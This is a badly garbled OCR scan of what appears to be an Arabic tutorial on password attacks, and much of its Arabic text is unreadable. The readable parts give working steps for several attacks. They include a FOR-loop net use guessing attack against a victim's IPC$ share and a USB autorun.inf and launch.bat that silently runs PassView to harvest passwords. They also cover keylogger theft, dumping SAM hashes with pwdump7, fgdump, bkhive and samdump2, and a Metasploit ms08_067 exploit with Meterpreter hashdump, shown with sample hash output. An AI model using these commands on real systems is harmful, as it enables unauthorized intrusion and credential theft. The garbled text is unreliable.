tL-jJLaiVl j CjI jjVl uL J Uj^j U jjo£ c j£ai jjoJI djUK .c_fl^JI ^Uajlt ^U^SV jjuJI CjUK jju£3 CjV jU^JI 

^j^ £A-*1£ .simple FOR loop ^I^^W (Automated) yi uj^ u ( u^3 jjj*^ £A*i£ .^^jj'j^'j 

jjj-<J| *LaK Jjoi^ ^1 jjl (j-a ^ jJ li^ V (j^J .4^1^31 ^ ~i l^Loai 4_IjL^a 4Jiillaj dDJj£juj L_aL» ^Laul Uiajl ^ l£^J jail 

JliUll ^ . (For loop)^!^ -W^ ^l^ki^U Automated u' oh^' c^j^ i>(Manual) jjj^' 
<J!>lk (Jjj ^lill ^^jII (j^aill L_aLi jjuJI CjIaKj ^i^^kjjaixJI ^Lgjoj! ^-I^)^jjaj| I g j£ <l3 4jjouj^)3I For loop Ail^ 



[file* credentials . txt] 
administrator " ,T 
administrator p>a.s sword 
admini s tr a tor admini st ra tor 
[Etc . ] 

From a directory that can access the text file, the command is typed as follows: 

<ns \>FOR /F" "tokens=l,2*" %i in (credentials . txt) A 

More? do net use \ \victim. com\IPC$ % j /u : vio t im, . com\ % i A 

More? 2»nul A 

More? echo %time% %date% » outfile . txt A 

More? echo \ \-vi c tim ^ oom aoct: %i p>ass: %j outfile . tD<:ir 

c i \>type outfile . txt 



^Uaj ^I^jjojU > ^11 ^^Lk jjLd 4 (JjjjjujIj ^] > ^ credentials.txt 
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Automatic Password Cracking 

<J jj^ jll t . lilaJJ JjljlkVI J^ J^l CjIj^VI (j-a ^jAslSI (jl j& CjI jLiLaVI ^cU^Jj JjuJI < - ll al£ Jjoi^I < ■ UjuJ .^jLl^VI 

Jjo£ lil^ tdifl jll (j-a J^J La aAi^ c*1Ua <jl£ ;L_fl^Jl jlfr^JI Jc JJ^JI J] <J jj^ jll ^ilaludJ l— u£ lil 

^ SjLjLft 4 ^ uij (Password hash) jj^>^ c>^a . jjj-^i ^ s^Ll* j^*-!! 3 ^ uull c al un^l t jjuJI 

.^Ij £>L^j! J ^jjjIa La %Ac ^s&j .4 ^iVl jjj-<JI 4_*K S^lcl ^^>^ (j-a ji&l La S^lc (jjjlg-II .4-pl*-II jjj-<JI 

. Jj^i (J^aj Jl \ g > >i^r> (j^-GJ V jll L_fl^)^.VI (j-a <LuoLoJ j& ^.1 j aL^jl J (J^-g-5l 

dsSj J l^jj^^j Jill jjuJI (ila ^jj V .jj^y^\ ^jj^^j o^j m1 ^* 1 c-hW^ ^ j^ r * c > ^ Jalaj Lili V 6<il3i 

^jjjl^Jl jJ jjl ^al^Jjajl ^aJ ^j-d j t^a^L^Jl c^-^ ^ J oL^jl ^LkjudJ ^^-Sc (J j> rt^W j& ^)Jai3l <-<J£ (J^i ^j-d 

<j^LkJI (jjjl^JI CjLixijjl ^^ic I jilcl -^Netware J 'c^^h j^j j^jj^-^ a - a ,^LLj ^Ac J - <j <j^aLkjj 

.uAhj^j 'Netware 'NT i-J^V 
Jj *juS j1I <jli tl^ilSjual iajoijl ^ . (Dictionary attack)^ ? cracker ^ W^-^ cr^^ ^-jIaKI ^jI ja ^Ua 

jjoJI t - \\ /sK J j- gaaJlj t<l^a1 ^ 4 ^ I^JLuiaSI JJQ ujjII jjl ^3U-a ^ l^JLui^ C5 ic JJ^X-Sl C _ 5 -Sc ^^iaij (Automated) C5^*^^ 

(user ID)^j^> x ^^ ^ i^iL n^ll ^ j^-^ l^^ ^ j^j Cy* '^-^ cJ^ ulS ^ K ^jjaJI < >l <il£ ^j^^ tS^uiAll 

jLlkjl ^la±Luj| ^aJJ jl 6 ^^.^<JI ^tjlUll (J jj^a^Jl ^aJJ ^^^^ ^1^x31 D^A J^)£jJj 

l^jjijA U- 4 L)J^ ^-aI^ j-ui£ (jli 4jlLui| Jau4j| ^ 

,c V^'im^l ^Uaill JjuJI 4^<J£ ^plA c aL> cjjxiaj j £3 j-d -li^J -1 

6^)LauJl JjuJI ( & <J£ Jc ^jl^J 6^lc (HASH) <— fil^ll ^ .'■^J <j^aLaJI JJJ-*3l A^& ^jjjlA ^jj^^J JjixjaLill A AiaJl - o 

(jSjiA Jaia. jl (J^ajC ^J^aI A£jx^>1\ C L^aJ (^jjuj dbaJ JJ^Jl ^jiU Jjj^ajl! tcAuj^U .^aUaill djULud^j ^j^^kloixi 

Jl J-^l (jSaaII ^j-d (jj^J (jl (jiajIiiAll ^j-<i ^jjjJ A-lii3l A^Ull (j-d (jV ^13i . JJJ-^I ^ ^^IslSI (J^aill ^j^j] ^ U JJ^>^ ^-<^ 

-C 5^ (j-aj Jl (j^l^Sl JjJ^ L^l ^l JJ^I 

AijLua-4]| J^i ^ jjj-a ^-4l£ (j-d lh^-SI Jtujjl djl^l jl jJuj <iU ^aujj ^i]| 11 Pass the hash" ^ <^Ua :4ia j^la 
a d jLola jjxSI I jHmi ciLuuSI j j^uJI j^ui] 4^1^ dUA ^ J^^' 1^ ^h^*i< nt ^ aII 4^i^Jl 

-A^a1\ CjI jia^Jl Jaxj Jl ^j^aS c jjj^a ^ S ji-uu» jjxJI 4.iuull lJLuu£I J^i ^ 

_^llj^a ^AaJLuax Jc- JJ^* 3 ^ 
^^^JjoiaII ((jjjlgJ!) jjjjullll A-Ldjjl j^. -li^J 
.S^jjuLall JjuJI 1 " & aS£ Jc J jj^^JI 
,4i£-<uJl JjuJI 1 " & ^ (j-a 4^jla ^Laijl 
.^LlA jjl J^S\ (JJ^ a I laJLujl J 4^<J£ (J£ JJQ UJJ 

^ Iklumll 4_jjA J^3 (Jjlki tilUA jl£ lil U 
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Find a valid 
u s er 



Obtain the 
encrypted passwords 



Encrypt dach 
word 




JUL 



Find the algorithm 
used for encryption 



Create a list of the 
possible passwords 



Verify whether there is 
a match for each user ID 



Performing Automated Password Guessing 

& jpJI t*lU* .(Automated attack) JVI ? ajLJI J j^j j) jUkj jl jSaj -Oli jjJI ^ J ^W*^ J^a lil 
'Jack the Ripper 'Legion yr* s j*^ 6 ^ .^^^ ^ J lA^ yr^ ^ j^t 

^i^l-V! ^Joh liA .net j-Vl <> siiL-VI jA JjUI ^ J^l 4 NetBIOS Auditing Tool (NAT) 

U J£ . j^VI li* ^l^kl^l J^l t> NT/2000 ^I^IojIj loop 
.FOR j*Vl J^k <> < aUli 11a Jl J! ^ . jjJ! 



C:\> FOR /F "token=l, 2*" %i in (credentials . txt) 
do net use \\target\IPC$ %i /u: %j 



: JUlt jailt J^ l ^ji i nl Automated password attacks 

J j*tfll cjUK ^ jlsu (jhto ^xA\ c_aL3l) ^ j*tfll t_aL JxuIj ^ill j A simple dictionary attack -1 
.ci^^l ^ ^ v^mrtl t CjULu^ ^ <Li^j ^5 1 John the Ripper jl LOphtCrack jj>^l cjLJS >^ 

iLjJall cjUKI! <JUi J&l ^ (Dictionary attack) <j*j-<ASJI cjU^a 
J ^ISjVl cjU£jjj lJj^ J£ JjUj U sjIc .4ikj <> ^ jll Jc jSSVl ja The brute force method -2 

. (automated exploration) JV I UsU^U^\ 
J!l<» cjLjSjj cJj^-^ ^ 'c-H j-*^l ^ ^ s^lcj a AijL.>Jl l_u3LojVI <J^ ^— j l ^-Ij A hybrid approach -3 

Stealing Passwords Using Usb Drives 

^ <j j^JI jj^Jl cjUK iL^a jil (physical approach) ^ USB o-^^ j$ ^ ^l^i^^ j^Jl CjUK <S jjai 

C5 ic o^Axld CAjLoi^. U^^^ (JjjUII _<all^<JI Cjl^ifLlillj USB O^J$ ^ j jjuJI ( ^ <^ A^jjuj (jj^^l ^ ^1 . jj;^^ 

<3jjoj jl ^bjlujl <Lj ,^ALudj La lij ^xil^JjujV iaLli^Vl J^f^ (_5-lc P^-J JJJ-^^ CjIaKj ^LqA^JLuiaII ^LgjojI dujJjVI 

USBo^^J^^ ^^^^ ^I^JjujL ft^A (jiaJjilill (3^J 

^l>iaj uaL jj^Jl CjIaK Aijjoj 5-^13 (j^j . c1jL<J£ Ajj^ajill <jjau3L ^.iaaVI ^JL j-<il ^(physical approach) c^^LJI ^ill 

4^jlauJl (jjjlil! Aiaa a . jJ jjj^ jlg-^. l$\ ^fl 4J^k-<Jl Jj^Jl < >1 ^^Ic (3flaij L_J jLujVI l^A .(^ULulajll j USB (J^^J^^ ^^^^ 
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<Lta a i±a II £>i& . jjoJI CjUK ojj^j *2 jj j^Sll ^ USB ^ . USBo^j^ ikl^b 

.2000 Jj^j Jj^j 6 7 Jj^j 6 Windows XPJ^uIl J l 3j. 1 ^ 

Aik^jjj Ij^ajl aJ jJ USB O^jP LS* U^** CS"^ ^ 4aja^ J ^ J"^ * USB c,5^ ^-J-^^ (JlAiulajJl ^Ja^ 

jj jjj^ll jjuoII diLalS (jljikVI rootkit e-^j] ^ USBj ^Ij^i ~i laJLJ ; .Messenger ^ 1 ^ ^ 4i j^JI jjuJ! CjIaK 

•AJU]| CjI jla^il ^j-a SiPtuL A j ^jj USB Jl£^ aI^L nb j-uJI ljIa1£ Ai j-uu 

.USB o^j^ J> CjI j^I jj^i ^31 j (.exe) ^I^VI c^li ^b*Vy ^ill CjULJI -2 

±\ j^Vl jl CjUjI^ *\\ ^^Ja j j ^jli Vn>.^ *Lijj -3 

[autorun] 
en=launch.bat 

.USB o-al j^VI ^ij^* Jj t aUl ^cjoij j autorun.inf ^ v^n^l iai^J <Sj£L<JI J ^ j±* A\ .asu 



start pspv.exe/stext pspv.txt 



.USB <>al jaVl ^ 6^ -5 launch.bat ^ f «^ ^ 

.(if enabled) J 1 ^ 1 siiU j USB u-l jfrl ^ j^j -5 

.USB <j-aljSV! cilj^-a J TXT ^-jUL J Jj><^ CjUK <jj J^j o^ajj 44_iLkll J JJ><^ CjUK 4_L^ajii CjI j^I iiiii ^jj -6 



Insert the USB drive and the 
autorun window will pop-up 
(if enabled) 



Contents of launch, bat 

start [>spv . e x&fs texit 
pspv . txt 



Create autorunJnf in USB drive 

[ iutcrun ] 
«n=laun,di . bat 




Pass View Is executed in the background 
and passwords wil l be stored in the TXT 
files in the USB drive 



Download PassVlew, a 
password hacking tool 



Copy the downloaded files to 
USB drive 



jl c&tLi^! <j j^JI cjUK <a jjJ ^l^kiujlj tiL j^U USB password recovery toolkit *^j iaSjjUI 




Insert 1/5 B into 
victim'^ computer 



Attacker 




User 



Passwords 
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Stealing Passwords Using Keylogger 

ClAiUil! j>» A x Ia§ JjuJI t ** ll &1£ .1$j>»^)J ^ <Lola all CjI^suII J ja. S^lc 4ili tUi ^^^joi ^tl^j 

JLujjIj ^iilLJI CjUaxjJa (Jj^ > aJI jl ^l^U^j Aj^3 ^.I^aII jl£ lili t^UlUj ,^jjILJI jl <J!^L^ jj^Jl c_ al <J-^] ^ ^ 
^ j ^ Keyloggers <^ ^U^j ^ajujj ^^lill ^l^I^JI > >n jjuJI < ** >1 .ipso ^^ic ^aJ * A\ jj^s ;<illi jc jjj^j 

cIjLaK j ^j^^kjjouJI ^.UujjI tdli ^ Iaj I^j ^IS c _^j3I ^jjILJI djUjjJa <J£ t Lua£ Keyloggers .4 ^W^j^ el) - * 
ci^jjjVI djULud^Jl j ^ jjjilVI ^jJl JaSfl (JjjJ ^1^31 J j t^asu jl j£*j Asu ^ Keyloggers j-*!' o* jjj-^' 
CjU» jIslxJI j* 4 m ^ AjJaS ^glc jjilxil ^jjjUII JjS j>* Keyloggers ~ .<^13i£ <^1j Aj^L^JI aJUJI Jj- ill I jjljiiaJ j^-aj ^-^lj ^ 

.Keyloggers «L cjL*1£ 4i j-uJ jj^^l^^ti ^jla ^JU^ ^ jjj^lti ^iaj^l JIoj 




Attacker infects 
victirn^ IccelPC with 
a soft wa r* krylogg ef 

miff mt 



Attacker 



login credentlatete 
hacker 




Victim 



Vktim logs an to thw 
rl-nnri^in ^prvpr w mii 
credentials 




Domain 
Server 



Artat ker g aire access. to domain server 



u^j^^ 4_i^jja3! J j^.^ ^jc .Keyloggers ^j. 1 ^ 1 PC 1 . \. l ^ j g jli t < >1 <ajjuj ^jc 

/ - gall ^.l^xJI (jjuJI CjIaKj ^Aklab<JI ^jojI) J ^—^-^ cJ^jk f UjUIj Keyloggers t J lT^. 

Offline Password Attacks (HASH Attack) 



.Jl^il i jlz> Ula a 4 (jil^Jl jl) d^A JJJ-^JI CjLaI£ jjj^j ^Jj ^U^j jjj-^JI 4-4l£ AiJlua^ 4a] j ^iaJL in ^121 ^lall! ^la« a 

.^Jl <(switchj router) ^jf^b <u^y t jjlLj) JjLiUI 4*&$l 4_u*u]L li^j 

Jj^aJl j) LLLuu U£a U£j .^U jl (JzLL V SAM tiU) j^ oilfSl Jj^a^Jl jj^l^J) 4a jj U Ulli j 

dUA ciiaJ! j-uu^J .JjUjj JJLuuil ^Uaj JjS j^ ^i-^JI jjjSJL ^Iajj SAM ^1^1 jl UjLuj Ufi U£ jjlaJ! uiuaj Jau (jilf!! ^^Ip 



Windows Hash Dumping: Pwdump and Fgdump 

lsjZ^J\ ls'^j Jj^j JU^ jj^^ (yj^ c5j^ Windows Hash Dumping 

yjis >l ^ jl HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users^li ^ NT registry 

jc jj^Jl CjUUj D^cla .AjLjjl^ ^ l!^'^ 4_i3l <J jll j>» ^ o L-aLJI 11a jV l^>^j AjUjI^ a j^ SA1VI t *°^^ 
^^JcVI J j^^ j^A^^ ( . illajj c ajl la jll jV j^ j .fetch the hashes J jjAbjll 4-Lila j ^1^1 ml (Jj^a 

.4o^UJI Jj^ajll cj! jliiJ ^ Vjl Jja^JI ^ jjj^ll '(Admin Privilege) 
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^^Luj ajjjj^I Jj^ijII jLU ^ Jaxj The Local Security Authority Subsystem (LSASS) 

^ji*^ J) dj^»jll j^l J^jj LSASS ^2 lU*^ Jllj DLL injection pwdump 

^jjij Jc; lU*j Pwdump .NT's SAM *^ i> (OWFS) jj^l lA* Jc- lU*^ <J^j > Pwdump7 
I ^ U & tSbVl jl cj^alll I^a .(SAM) <■ c> g:.:^ <^l ^^klaiJ! CjULu^ (LM and NTLM) jj>^l cjUK cjL^U 
^ ajjSII cjI j ^Ij^IujI ^jj ^ j CjULJI ^alkj ^ SYSTEM i aL&li j SAM c aLil) ^-l^kim! (jyja 

.^ixJI ^Uaill Jc <jjtal cjIjIjIoI ( . llLajj Jl I^a ^l^kjjujl .^lia^aII dAiLJI Jc- Uiajl j^lS <ul pwdump7 

: JUJ) jS^aII (> pwdump7 <> j)A*aV) Jj^aj 

http://www.tarasco.org/security/pwdump 7/index.html 

Jc (Jjj jIaII (JAlVI J^Ji Shift jj^l J^ 4 ^>*' J*^l J 3 ^ J^ 2 *- L>* SbVI jjAbj JjxjuHII ^aUaj ^ 

Open Command Windows here V* ^ c^j^ JJIj .pwdump7.exe J 0 cSJ 1 ^ c£^l 

:JVI£ 



it 



pwb-11111 
-11111-vide 



c 

-a- 



El 

pwd ump 7 




ll 111 >> il^ 




Open 

Open in new process 
Open in new window 
Add to VLC media player's PI ay list 


ad 

pwdump 7 




Open command window here 




Play with VLC media player 



;4jMI Jl ls^jj jiill a*_> 



Administrator: Command Prompt 




.(ntds.dit)^l^l J jj>^l o^j^ ^ active directory u^j^ tic -^j^l* 

jiill cjI ^1 jj^j j^I jVI J pwdump7.exe -M^S c& J 3 pwdump7 sbVI J^i? jVI 

.Enter <ija 

I^Vl^ SAM <■ ^1 C> J JJ^J^ J^ull ^UaJ J 4 k uixll djl^lgJl jl^Jal Jl c£^jJ L-fl^jai lifc 



Administrator: Command Prompt 



_ n 



7 : NLI NUXNpwduFip7>PwDuiTip7 - exe 

Pwdump u7.1 — raw password extractor 

luthor : Andres Tarasco flcuna 

irl: http://www.514.es 

I dm in is t rat o r : 5 00 : NO Pfl S S UORD «hxxxmm 
► C0: : : 

jana:1001 : NO PftSSlfOHD ««««>cM'"*««««M'CM 
lomeGroupUserS : 1003 : NO Pfl S S UORD kmmkm 
ffl7CF: : = 

IpdatusUser : 1004 = NO PflSSt)QRD«««««x«« 
? C: : : 

iflNGUflRDJIJSER = 1006 = NO PftSSUORD*** 
►F0985C: = : 

? : NLI NUXSpwduiiiipV> 



««««««« = 3 1 DG CFE0D1 6 ft E9 3 1 B V3 C5 9 D VE0C08 

:NO PftSSUORD >"*««««M'CM'"*««««M'CM'"*« = = = 
:71B9V3B8ftD15EB31218Dfl965144861VB= = = 
<»c M »cxic«icM M = E0Fft0C73ft5C577ft81BF9E4E846D 

ocmmm^m : 6 2 9 3 VDB1 1 5 44 79 9 04B8 E0F0ft 1 D9 EFft 

<>cm>cm>cm>cmm>cm: V494FlC94F6EF4Dft0C5Eft66F8 



.Administrator cjU^!^ Jl ^UbJ SbSft : 4Jajal4 
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pwdump7.exe > c&j^ CP- uj^j SAM cjUjI^ j^I ^ jl jSl^Jl £>i* jj j±h ^jSj 

.Enter ^ c:\hashes.txt 

.SAM t aUl CjUjI^ ^IjaJLJ jAj SbVl ^ Sajk j 11a j 

. Jl£ <J-l»-uu3l ^aUaj J jl* abVI £>i& 

pwdump7.exe (Dump system passwords) 

pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files) 
pwdump7.exe -d <filename> [destination] (Copy filename to destination) 
pwdump7.exe -h (Show this help) 

c\ J£ l^j ^ ***** J\i .NT/2000/XP/2003/Vista Jj^j *>*i c> jj^ 1 feu* 1 * bi Fgdump 

jSI jla a ^J^)flJj Asu ^jc liiiil] 4_Lta3l CjliLJl Aiijj (JLg (_£^)^.VI JJ-*VI (j-a ^Asu ^U^ll ^a^l Igi^-aJj Pwdllllip 

J a jl Asu <Jc- £■! JJUJ 



Administrator Command P-ornpT 



_ o 



|c: v >f 9ftiini|i 

Sfimnp 2,1 .6 - fizzgig *nd the ni^ht ^ group at f o a f u-s .not 
■it ten tu iirtku je>rriakun a G lifis Just A hit M^icr 
ipuright <C> 20m f izzglgr *nd fDDfus.net 
griump cone a with ftMSuLUTKLV MO U ft H h H NTV * 

his, la f rcc soft wa rc # An d j^o u ar c- wc lea nc t a ire d i a t r- i hut c it 
nder certain conditions ? aee the COPYING and README riles for 
f e Info rrvat Id n - 

pampietsrE spnc if ied r do inn* & local dunp . Specify -7 if yau ars looking for- h 

— Session ID: Z Bl 2 - B¥ -2 1 -B4-b0- b B 

tart Inn itupip on 127. §.0.1 



•* Be ginning* local dump ** 

<127.S.B.i>: Microsoft Window 
asc/orcls dumped successfully 
c he dumped. = ucc c s s f m 1 Ijy 



Unknown Server < Bui Id 84HH> <rr.4-bit> 




C:\> fgdump.exe -h 192.168.0.10 -u An_Administrative_User [-p password] 
C:\> pwdump6.exe -u An_Administrative_User [-p password] 192.168.0.10 



^Lucl ^Jjj^J Jl ^ll^J L_fl jjuj SA1VI L *°^^ L>* JJ^>^ (jjjlfc £J^)3J -lliliJ ~ lalLuJJ ^^£3 ~ I^JLuid (jl UjUjcI J £jJaj (jl L_L^Jj 

. JJJ-<J1 4 ^JJSJ p^J JjS jjoJI 4 JlA^j cilia ( ; lUa^ t jjjl ')Ui)\\ 11a ^ 

jSl j ^Lili SAM cjUj!^ ^ lJj^ pwdump7 ^ ^[*.fgdump] J u^W^ cl^j^ Fgdump >»VI 

Extracting the Hashes from the SAM (Locally) 

iajoijlj t J lalll Jj Jxill J Jj^a jll Uj^I j <A^*1\ CA**$1\ j^SUj UjV .^1 jjoj A& Jc J oi^ JjL?^ ^J^ 3 < la^Ji (Jjo^J 
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.SAM (J\ Jj^jJI yi jljJ c>jj <hJ lU^ o 3 <Ua V jj^ijj J^ull ^Uaj liA .Windows SAM 

sbVl JaaJI c>^ .cj^Vg-St Jj^ jll obi J.ikU iiUj j^J t*Uil <SAM ( aLll Jljj V t^bU 



jl^JI <> 4^ j^J! o^l jSVl ^ j^j lA^ y^ 1 j 'o^ J 1 ^ J) (43 ."Live CD\DVD " jt^VI 

~ I^JLuiaII BIOS ^ L-Lud^ ^glc ^jjILJI (j-a ^I^JjujI tilj£ ;Ujlilj 4_iJ jj^all (J^al J^Vl ^ixjulL ^ajlj <iL ^aL^Jl L_fl^Jl ^Uaill 

/Ltf j^l u-l c> i> ^ t^V 1 W BIOS ^bl^l J >^ jt ^-211 (F9 in HP Lap) 

oal jSl ^LSuV UNetbootin ^ Ljajl A \ <.aA <>al Jal ^3j^» u>n ^ill ^IkJI ^LA jSj ^ JU> 
^ ^J! >Vl ^bujj^l t> ^AxJ! j "live" ^ ^ lM ^ £^ UNetbootin USB 
cjIj^I <c ^ 6 USB ^j^-* (j-o <L^U Jjy ^Uaj ^li-JiL till ^-<ujjj ISO UNetbootin 

.Igil^jjujl > ^Uail l-jjjjj jjjxll ^UaJ ^liye CD / DVD Jl^Ji \^<& .4-! J^^ ^ J 



(JLLdjiill cJ^-^- c3^^ ^ .Windows <> ^^-Sc ^jii^j c^iJl ^aljSVl til^^xi cJ^^ u-* 



#mount©-t©ntfs-3g©-o©rw©/dev/sdal©/mnt/sdal 



"fdisk -1" J-^VI (J-j*j^J <Llfl 6 JjAJI Jjxjuall ^Uaj ^^Sc IglLaaJ ^ll^J C5-^^J jj^J lS^^-^I ^aUaj J>LaJ ^^jlt 

uj^j dii^ /mnt (mount point) <^ <^^j c^j £^ ^ .(mount)<W^ ^ 

:"mkdir" j^Vl '^L^ ^I^j ^Ull - 



#mkdir©/mnt/sdal 



.SAM ^jL J521I IjjIS jV! uj^ J ."C:\" jj^ij 

I JLix, jjII ^ JUll j-Vl ^ cJjjia UC. c*S]L f Uall ciixy - 



#cd©/mnt/sdal/Windows/system32/config 



.SAM < ^ ^j^j] <jjlkJI cjI jlaaJl J£ Lpa^S <La3 ^Ull J£ai3l jjjj .SAM ^ aL> ^U^i l-j^j « JiLdjjII jlLl Is 



root(gkali:-# fdisk -1 1 

Disk /dev/sda: 10.7 GB, 1073741824S bytes 

255 heads, 63 sectors/track, 1365 cylinders, total 2G97152G sectors 
Units = sectors of 1 :+: 512 = 512 bytes ^^^^^^ 
Sector size (logical/physical) : 512 bytes / 512 b vt en ^ 000 ^ 
I/O size (minimum/optimal) : 512 bytes / Sl^J^fW^^^ 
Disk identifier: 0x9d499d49 0 



Device BooJj^^^^Start 

/dev/sdal * 63 
root@kali:~# mkdir /mnt/sdal 
root^kali:~# mount -t nt fs-3g 



lUi 0 



locks I 



FS/exFAT 



™ /dev/sdal /mnt/sdal 
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:-# cd /mnt/sdal/WIND0WS/system32/config/^ 

root@kali:/mnt/sdal/WIND0WS/system32/config# Is + 

AppEvent.Evt SAM * SECURIT Y. LOG SysEvent.Evt 

default SAM. LOG 1 1 Tr +~™ 

default.LOG SecEvent . Evt software.LOG system. LOb ~ 
default. sav SECURITY software. sav 

root@kali : /mnt/sdal/WIND0WS/system32/conf ig# | 



TempKey . LOG 
-iif ~rf|jf f 
userdiff .LOl 



^^Ic SjjSI! Ljj^l 4 kaill £c mL p^l\ ^-Ij^IujV Samdump2 cs-^ ^ ^l^iuit 'SAM ( aUll ^W^k ^ 
6^)Laui jjc. 4_kjaij ^jiajc. <J^j (j^i .SA]M L jj° ujj <J V 'Vji Sj^* t^c- l ; ^al jll 'SAM! ( * a ^^ ^-^j 
t_flLJ| tilil "system" y?^^ e^ 1 ^ Samdump2. Samdump2 J^-^ -M^j Cp^ 'SAM 

.SAM ^ & ls'^ o^^^ "system" ^1 t>^ .SAM 
^jj ls^ SAM '"system" ^ ^ "samdump2" j*Vl <Samdump2 J^-^ 

; Jllxijlill ^>*^ (Jjxj^iJ (Jjjia (jc SAM c aL&li djUjla^ (j^J t4 j^q^l £>i& lie. 



#samdump2©system©SAM©>©/tmp/hash.txt 



j^l /tmp/hash.txt <-i^t ^ SAM <-&^ cjLjj^ f jSj s am dump 2 0' 



^uji L_fl^i3l ^Uaill 1 bkhive ^^^1 a? jjj^ t> uj^ ^ .system i> (Syskey bootkey) 

t laaJl (jjuo^J .^.jVim^l ^-ULJI C5 ic ^jj^j l_s jjoj ^jII j ^cjUII c aL&li ^juj! j djliLJI ^Uaj jjs j!i3 <^.L^. (jaifl t bkhivecJ^*-*^ 
^ .SAM c aUll ^ill (jjaij c aLll "system" ^ aLll J^Uail c ^i£j U ^ diajjoj jjliU jli t j^i U^j 

. Windows/system32/config^^^ ^ ^ sjIc j tUjIui jj 

^ ^-UiJI ^-Ij^JjojV bkhive s^Uiu»VI 'SAM j system ^-al^i ls'^ ^xll ^ J*i3U t&] ^Ijjal C5 Ic^ 

#bkhive system sys_key.txt 

c aLili ^ Samdump2 ^ ^ > ^ jjuos t<!LaJI .Samdump2 ^l^l^b LLq <l^al 1 v^^j <Jaii3l lie. 

.aliii (jjfa U£ Lb^l Ijj^ cjIuIjI ^1 sys_key.txt 

#samdump2 SAM sys_key.txt > /tmp/hash.txt 



^oot0kali:/mnt/sdal/WIND0WS/system32/conf ig# bkhive system /tmp/syskey . txt 

Gkhive 1.1.1 by Obiectif Securite 

http ://www.obj ectif -securite .ch 

original author: ncuomo@studGnti.unina.it 

Root Key : $$$PROTO.HIV 
Default ControlSet: 001 

Bootkey : 5aada46c8d93567e2O6ab037da78Odc2 

rootQkali:/mnt/sdal/WIND0WS/system32/config# samdump2 SAM /tmp/syskey .txt > /tm 
p/hash .txt 

samdump2 1.1.1 by Obj ectif Securite 
http ://www.obj ecti f- sec u riie]/c7i fTl ' 
original author: ncuomo(asti |id|^n^. Airy '"'iLjp-^ 



Root Key : SAM 

root@kali : /mnt/sdal/WIND0WS/system32/conf igrf h | 
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root@kali : /mnt/sdal/WIND0WS/system32/conf ig# cat /tmp/hash .txt 

Administrator:500:33ef0e84G3alG51136G77a718ccdf409:ffSdfcd941b6f84958dO106aaf650 
fed: : : 

Guest :501 :aad3b435b51404GGaad3b435b51404GG:31d6cfG0dl6ae931b73c59d7G0c089cO: : : 
HGlpAssistant : 1000 :c3c226b0c3bfGc57cG3lGG2773d69baO :620820d675a4ccc28055OO5G76G8 
250c : : : 

SUPPORT 388945aG : 1002 : aad3b435b51404eeaad3b435b51404Ge : 2f eala61 lbf 83269b878555d3 
dG675a3T: : 

JANA : 1003 :aad3b435b51404eeaad3b435b51404ee :31d6cfe0dl6ae931b73c59d7e0c089c0 : : : 
rootfflkali : /mnt/sdal/WIND0WS/system32/conf ig# [] 



L_aLJl (JIjujjI (Jj^a {jC A Ll > n n ^aJJ £y (j£-aJj -<fc5 -^Jl O^ji^ LS^\ ^ >^ J clP^ '^"^ ji^Jl JJ^>^ A-aK (jjjlfc Uj^3 ^jVI 

j£ta t^jiilUJ! UK ^ .(jil^il c> ^^uaij j USB o^l ^ 2' J J J J ^ JJ^V^ Au^' c3^J^ c> hash.txt 
jl^aJI l!^*-^ s^tc] lie <jj ^^-istj j .Sj-oioui ci bau] Cjjjjjjull j "Live CD" j» > ^ o-^j* cJ-^ hashes.txt c 

<j£Jj ^jli (JSVI Cjljll^aVlj XP lS^-^I l!^ J*-^ LM o^-6-^ UJ-^ ^-^C- 4jI 6 (J^-&^ U>* L^P" ^ <-M* ^ ^ 

Admniatrator: 500 : 0 1 FC5 A-6BEI7BC-6 9 2 9 AAJD3B4 3 5B5 1404 E.E. : 0CB6948305F797BF2A82S07973B39537 : : : 

Administrator: 500 :NO PASSWORD********************* I 0CBG948805F797BF2AS2S07973BS9537 : : : 

Extracting Windows Password Hashes Remotely 

Asu (jC JJJ-^ ^-aK (jjjUfc ^^^ic <J jj^^J! 4_jaiaLL<J ^jUL J-^aJ ikli U jCO t^^i^Jl jjlala (j-a Jjo£3 (j^C- (jVI 

i^j^la sasu ^jj oiixJI ^^ic jjuJ! CjIaK jju^ .remotely 

Man in the Middle attack 4- 

jl^l^jjajj ^ kiu c _^j3I ^ jj^ll aj^xJI tilU^ j ettercap ^ajoj^ ^ ^3Ua ettercap 

Metasploit / hashdump ^ 

UlUld ^ .l^^JI jW^^ exploit >^*j j axj ^jc ^jj *^lc o^ixJI a ^^ic jjuJI djUJ£ jju^ 

6<xl<ui A^UIU VNC ^ .if*J^ VNC ^ (j^lSaV Metasploit ^ Uli^j Uik^ t^LaJI 

^ j^j^ yr^j axj ^ J^i ^ J j > ^11 Metasploit ^-fl^j .Meterpreter 

Meterpreter J^-^ ^ .^J j^-^ jj^^ cjUK j (c5 j^' jj*J u^?) j^^ J j^a jll 

jjiijj] <ajU3I 4_ii<iVI CjUIVI ^^a^ JjW^ ^ Meterpreter." hashdump " J^^j aLLouj uAi ^UJI lJ^JI 

^jij lJjjoj lg-£U. metasploit a^j^ jll jiixj armitage sl^Vt ^^ludj lJjjoj j^VI <Jj^uJ 

i^Vl^ aJ^ meterpreter session jW^I exploit 
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KALI [Running] - Oracle VM VirtualBox 



Mon May 5, 6:27 PM 



Armitage 



Armitage View Hosts Attacks Workspaces Help 



► \m auxiliary 

► tiSt exploit 

► ft payload 

► \m post 




192.168.1.101 
NT AlTTHORITY\SYSTEM @ TEBA-293DD90F08 



[ Console X~) Scan X | Hail Mary X ) 



[♦] 192.168.1.101:139 (windows /smb/ms08_067_n eta pi) 
[*] 192.168.1.101:445 (windows/smb/ms08_067_netapi) 
[*] 192.168.1.101:135 (windows/dcerpc/ms03_026_dcom) 
[*] Listing sessions... 
msf > sessions -v 

Active sessions 



1 interpreter x86/win32 NT AUTH0RITY\SYSTEH @ TEBA-293DD90F08 10. 0. 2. 15: 58942 -> 192. 168. 1. 101: 16752 (192.168.1.101) 
e x p loi t /wi n d o ws /smb /ms 08_067_n e t a pi 



IQ^^-S.^ <§l±J Right Ctrl 



icPVIS hashdump j*VI fjfr aJc meterpreter session g&j jW*^ ^ exploit S^M ^ 



meterpreter > hashdump 

Administrator: 500: 33ef0e84e3a 105 1136077a 7 18c cdf 409: ff8dfcd941b6f84958d0106aaf650fcd: : : 

Guest: 501: aad3b435b51404eeaad3b435b51404ee:31d6cfe0dl6ae931b73c59d7e0c089c0: : : 

